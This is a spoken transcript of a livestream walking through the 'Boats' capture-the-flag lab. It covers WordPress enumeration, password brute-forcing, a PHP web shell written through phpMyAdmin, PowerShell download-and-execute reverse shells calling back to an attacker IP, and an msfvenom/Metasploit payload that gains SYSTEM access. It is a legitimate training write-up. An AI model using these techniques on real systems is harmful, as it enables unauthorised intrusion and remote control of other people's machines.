All right, boats on CyberSec Labs. Let's go ahead and grab that. Exit out of everything. Make directory boats. Boat or boats? Boats. Gotta make sure I spell it right, you know. He may not be fully started up yet. We do have port 80 again. We also have 3306 ported to us. Let's go ahead and try SMB client like real quick. So I did not even really even try that last time for a while. Okay, nothing in there. Let's go ahead and check out that port 80. Let's see if we have anything in there. Wow. Yep. The best ship of a class of battleships built for the Imperial Japanese Navy shortly before World War II. Looks like it didn't help very much, huh? Looks like we got a WordPress site here. I'm allowed to say that. I'm in Okinawa. I'm allowed to say things like that. So we have a WordPress site here. So let's go ahead and do a WP scan this guy. So let's start up with a WP scan CD into boats. And we'll do a WP scan, tac URL. Boom. Tac EU, which is going to enumerate users. Maybe find some people in here. We might also want to enumerate all plugins, stuff like that. We'll do that here in a minute after we're done with the enumerate users. And then we'll go from there. All right. Hopefully we get something. We got user James. Okay, cool. All right, James. Let's go and enumerate all plugins. We'll just do it like this. We're not going to do the aggressive one just yet. And while that's running, let's go ahead and do a WP scan, tac URL. And we'll do tac U James, tac P user share wordless rocky.txt. So we'll throw those two at it. What? Invalid option tac U. Oh, is it capital U? Is that why? And capital P? Mm-hmm. Yes, it is. I mean, kind of. What do you like to know? Not really too much, but kind of. I'm usually on every day that I can be. Just really every day. All right, look at that password attack go. We're on number 2 at 28,688. I think it's freaking flying, huh? Let's try it with attack T. Let's say 100 threads at it. And we'll see what happens. See if we break it or not. We're going to break it. We did have a plugin that I saw also. 2014? Lowest I've ever seen is 2017. The cart press, huh? Let's go ahead and search plate the cart press. Oh, you hate to see it. What version do they have? Not actually telling us, but privilege escalation unauthenticated. Okay. Let's go ahead and look at that. Let's go ahead and cat 50378.py. See what this guy's all about. So it looks like authenticated privilege escalation. 0.3 exploited pi target URL. And then our target URL, and that's it. I mean, it's going to be that easy. You might as well throw it at it. Looks like what it's doing is it's creating a new user for us. Just kind of going over that guy real quick. Just kind of looking at it like real quick. Looks like he was just creating a new user for us. So that'll be nice. And target not vulnerable. Are you lying to me? Okay. I mean, if you say so. All right, what do you like to know? You have a good one. Well, this is going to take 2 years to brute force this thing going that damn slow. Okay, while that's running, let's go ahead and keep looking at that port 80 there. Firax Buster for the website, right? Let's do big.text. Let's see what else we can find here. Everyone's still awake? I feel like a lot of people are probably sleeping like right now, huh? In the chat. They're going to wake up. This guy's still on? What the hell? All right. I think tomorrow I'm going over the black boxes for the EJPT, the new black boxes, because I've heard that they put out new black boxes. I went ahead and checked it out, and yeah, sure enough, they did. So I was thinking tomorrow I was going to do that. Go over the black boxes and everything. Whoa, I missed a bunch of chat. Dude, okay, 1 second, sorry. Wow, I missed like a bunch of stuff. Was the Power Up PS1 issue the PowerShell, or they forget to invoke all checks module on the previous file? No, it was PowerShell. We were still stuck in like some type of like PowerShell hell kind of thing, that's all. Oh, I got PHP my admin. Is it actually open? Yeah, log in. Try to log into there. While that guy's running. Alright, maybe we can't. That was a joke. We can get to the change log to do. We can get to all this stuff, so. Alright, I just don't think that one actually likes me. Let's go ahead and try PHP my admin. Secure connection failed. Why is it trying to be secure? Is 443 open on here? 100% is. Let's see, hosts. Now you gotta do something like this. What was this one called again? This one was called boats. We'll do boats.csl, I guess. Enable TLS 1.0? Are you serious? How old is this box? Yeah, I'm sure if I would have actually put invoke all checks at the bottom of Power Up, it might have actually ran. But no, we were just kind of stuck at, well, no, because we were getting into PowerShell. It was just, PowerShell just sometimes just doesn't like stuff. PowerShell's kind of an asshole sometimes. That just made me cough. We just log. I've never gotten in to PHP my admin. You always go to it and you just don't get in it. No fucking way. I've never once just gotten into it on the web. You always like find it like after you've already come in, you know, and then you go to that site and you're like, yeah, there it is, but we already know about it. Let's try to crack this then. Let's do a nano hash.txt. I've never actually done this before. Let's do a John. See if that actually works. This thing has everything running on it. This thing has 1,000 things running on it. John might actually take a while with that. We might actually have to bring that back to my local machine and actually do it like that. But if we have PHP my admin, we should just technically be able to just do whatever we want, right? Like I said, I've never actually just hopped in before to something like this. That's what I gotta do, like right there. Let's go ahead and do something like this. And we're gonna go down to web, or I should say, or I guess databases. Now we'll do web. We'll say PHP my admin. All right. Let's pretty much follow along with this guy like right here. So we're going to make a new database, right? I think we just make a new table also. We want to make new, create a new database. We'll call it carrot. And what did he pick for his? Mine's older. Collation, okay. So, create a new database. All right. Create a new table on the database, just whatever the hell we want. Create table. Click on it. Okay, so we didn't even create a table. You just clicked on that guy. So from there, we're just going to go back to carrot. SQL. Say click on SQL. I've never gotten into PHP my admin before. And then we'll just throw in a PHP get command. That's all we're going to do from here, it looks like. And that's going into xampp htdocs backdoor.php. Totally overslept. What's up there, Luxury? How you doing? And then we just throw something like that in there. So let's go ahead and throw that into this guy. And he's going to see xampp htdocs backdoor.php, which should exist on the system. We hit go. Okay. And then we should just be able to go there, right? We're not going to be in port 81. We just need to just go to our regular site there. /backdoor.php. Or if I had to do like question mark command equals who am I? And there we go. Let's frickin' go. Okay. Can I do system info on here? That would be funny. It just dropped just a whole bunch of system info. Might take it a minute, but yes, I can. And then Control U should actually clean that up nicely. Okay, let's do a 64 based. See, Control U cleans up all nicely. They got some hot fixes on here. It's 2012 server. Let's do a command equals. Can we do PowerShell? IEX IWR HTTP 10.10.0.16 slash invoke PowerShell TCP ex.ps1. I'll show you why I'm doing this, or why I'm trying it at least. Let's go ahead and go into CD into tools. So I'm going to do a nano on invoke PowerShell TCP ex.ps1. We're going to go all the way down the bottom, and we're going to tell it that we want to invoke PowerShell TCP, which if we go all the way back up, right? If we go all the way back up, that's the function that we call for to actually run this command. So invoke PowerShell TCP, and then it's going to go ahead and do a reverse IP to me on port 1234. So all we got to do now is just say netcat tech LVMP 1234. Let's do an RL wrap with that. We'll run that. And this guy should, because he's going into memory, run as soon as he goes into memory. So all we got to do now is just create a Python server, tech M on port 80, and hope that PowerShell actually gets that command. That's really what it is. We'll see if we get a callback back over here. I'm waiting for a callback over here. See if we actually get one. Not looking good so far. RL wrap supposedly gives you more functionality with Windows. I don't think it does at all. If I press Control C, I still get kicked out of it. But on YouTube, I get yelled at every day for not using RL wrap. I say, oh, okay. It called for it. See, I'll just call for it back here. The invoke PowerShell TCP EXPS1. And now we should be getting, hopefully, a reverse shell because it should run that guy. Should technically run him. As long as it can take the spaces and it automatically does it for me, I don't care. Other than that, then we would have went to Burp Suite, did like set side 20 and all that crap. But it should run that guy like right there. He got him. We didn't invoke expression, invoke web request. We got 200. So we technically should have called back over to here. Let's make sure that file is correct. Down port 1234, 10.10.0.16. Invoke PowerShell TCP. That all looks good. Let's put on port 4444. That shouldn't really make much of a difference. But it did get him, so he should have ran it. Now, if it actually worked, I don't know. But he should have ran it. Should have. Oh, up and down keys? There you go, up and down keys. So we got him again. That time was a lot faster. But he's not running him at all. Now, my other question is PowerShell even able from 2012 to do an invoke expression, invoke web request? We have to do that net web client thing. Something like that. That. Right there. Download string, then we download that string, right? Let's go and try that guy right there. Download string. And then we download that string like right there. And then we go over to here. And then we throw in what we actually want to download. Okay. Cool. Let's go ahead and do that. HTTP 10.10.0.16 / invoke PowerShell TCP ex.ps1. I think that's it. See if we can pull it from back here first. Not looking like it now, is it? Because he didn't even pull it that time. Okay, let's try that. The text C. It's taking a little bit longer over here, and he didn't do it that time. Keep trying. Try the PowerShell.exe execute bypass taxi. And then we'll throw it in quotes also. Try it like that, maybe. Quotes, and then we'll quote at the end here. We'll try to run that. See what we get. We were getting it before. Still loading over there. Nothing up there. What we got here? Let's try to do it IEX IWR again. IEX IWR. Try that like right there. See if he downloads that PowerShell text C. No, he doesn't give a shit about that. Nothing. At least before I was getting them to download. I was at least getting a thing to come through. Huh. That's very, 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 very strange. That's not doing anything anymore, huh? He's not even trying anymore. Okay. That is very, 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 very strange. Okay, without the quotes, he downloads. Without the quotes, we get 200. The text C also downloads without the quotes. So why isn't he running it then? Let's try forcing him to run it. It's like he's not getting back to me. Okay, maybe there's a firewall, something like that in the way. So we know we can do that, right? We could do that. Okay, easy day. Now we just need to somehow get back to ourselves. So we got the PHP admin. I guess we could really just grab the flag if we really want to. You know what I'm saying? Like, we could do that. But let's make I guess a file. Let's try to make a shell.exe or something like that. You know how try-hack-me doesn't like the bash reverse shells? I'm wondering if this thing just doesn't like PowerShell reverse shells. No, because it's going into memory. So that's what I thought at first with the firewall, but it's going into memory. So I don't think it is. I don't think it is, just because it's going to memory. I'm worried this guy just doesn't like, hey, thanks a lot, Zero Twitch Zero. I'm worried this guy, because say that thing try hack me has its little faults with bash reverse shells. So let's do a CD and a boats. Let's do a MSF Venom. Yeah, we can just run something like that. L port 555. We'll call it shell.exe. Why not? Sure. We'll do a MSF console, tag Q. We'll go ahead and hop into there. And we'll use that as our payload. Set this as our payload. Like 3, there we go. And this is going to be called shell.exe, right? So let's go ahead and try to do a, what if we do a wget for it? What if I do a PowerShell wget? Then we'll know that it actually is calling a PowerShell. Yeah, I got it. We got 200. Huh. Use exploit multi-handler. Set the payload to that. Set our L host to 10. Set our L port to 5555. Go ahead and run that. And then we'll just try to run that shell.exe. And we do run it. So we do know that did get it and everything. Put it in there and everything. And now we have interpreter session open. Let's go ahead and go to shell. Who am I /priv. Oh, we got anti-system authority? Yeah, it did say that we were, but I just didn't think we were going to pop it as that. All right, CD into administrator. CD into desktop. Now let's go ahead and type out that system.txt. So boats is done. Let's go ahead and throw the hash into there. Bam. Submit that hash, and we'll throw in there CD and James, desktop, and type out that access.txt. Let's frickin' go. I wonder if John would have ever actually... John the Ripper, I wonder if he would have ever actually cracked that one guy. Most likely. After so long, he would have. Alright, so we have completed boats. Awesome. So...